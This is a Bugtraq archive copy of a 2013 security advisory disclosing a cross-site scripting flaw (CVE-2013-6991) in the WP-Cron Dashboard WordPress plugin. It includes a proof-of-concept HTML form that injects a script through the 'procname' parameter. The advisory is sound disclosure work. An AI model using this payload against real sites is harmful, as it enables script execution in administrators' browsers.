[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Cross-Site Scripting (XSS) in WP-Cron Dashboard Wordpress plugin
From: High-Tech Bridge Security Research <advisory () htbridge ! com>
Date: 2013-12-26 11:09:03
Message-ID: 20131226110903.1E12E2C54882 () htbridge ! ch
[Download RAW message or body]
Advisory ID: HTB23189
Product: WP-Cron Dashboard Wordpress plugin
Vendor: OKAMOTO Wataru
Vulnerable Version(s): 1.1.5 and probably prior
Tested Version: 1.1.5
Advisory Publication: December 5, 2013 [without technical details]
Vendor Notification: December 5, 2013
Public Disclosure: December 26, 2013
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-6991
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in WP-Cron Dashboard \
Wordpress plugin, which can be exploited to perform Cross-Site Scripting (XSS) \
attacks.
1) Cross-Site Scripting (XSS) in WP-Cron Dashboard Wordpress plugin: CVE-2013-6991
The vulnerability exists due to insufficient sanitisation of user-supplied data in \
"procname" HTTP POST parameter passed to "/wp-admin/tools.php" script. A remote \
attacker can trick a logged-in administrator to open a specially crafted link and \
execute arbitrary HTML and script code in browser in context of the vulnerable \
website.
The exploitation example below uses the "alert()" JavaScript function to display \
"immuniweb" word:
<form action="http://[host]/wp-admin/tools.php?page=wp-cron-dashboard" method="post" \
name="main"> <input type="hidden" name="procname" \
value='<script>alert("immuniweb");</script>'> <input type="hidden" name="submit" \
value='1'> <input type="submit" id="btn">
</form>
-----------------------------------------------------------------------------------------------
Solution:
Vendor did not reply to 3 notifications by email, 3 notifications via contact form, 1 \
notification via twitter, 1 forum thread. Currently we are not aware of any official \
solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is \
available here: https://www.htbridge.com/advisory/HTB23189-patch.zip
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23189 - https://www.htbridge.com/advisory/HTB23189 - \
Cross-Site Scripting (XSS) in WP-Cron Dashboard Wordpress plugin. [2] WP-Cron \
Dashboard Wordpress plugin - http://wordpress.org/plugins/wp-cron-dashboard/ - \
WP-Cron Dashboard Display for WordPress. [3] Common Vulnerabilities and Exposures \
(CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE ® \
is a dictionary of publicly known information security vulnerabilities and exposures. \
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers \
and security practitioners, CWE is a formal list of software weakness types. [5] \
ImmuniWeb ® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary \
web application security assessment solution with SaaS delivery model that combines \
manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic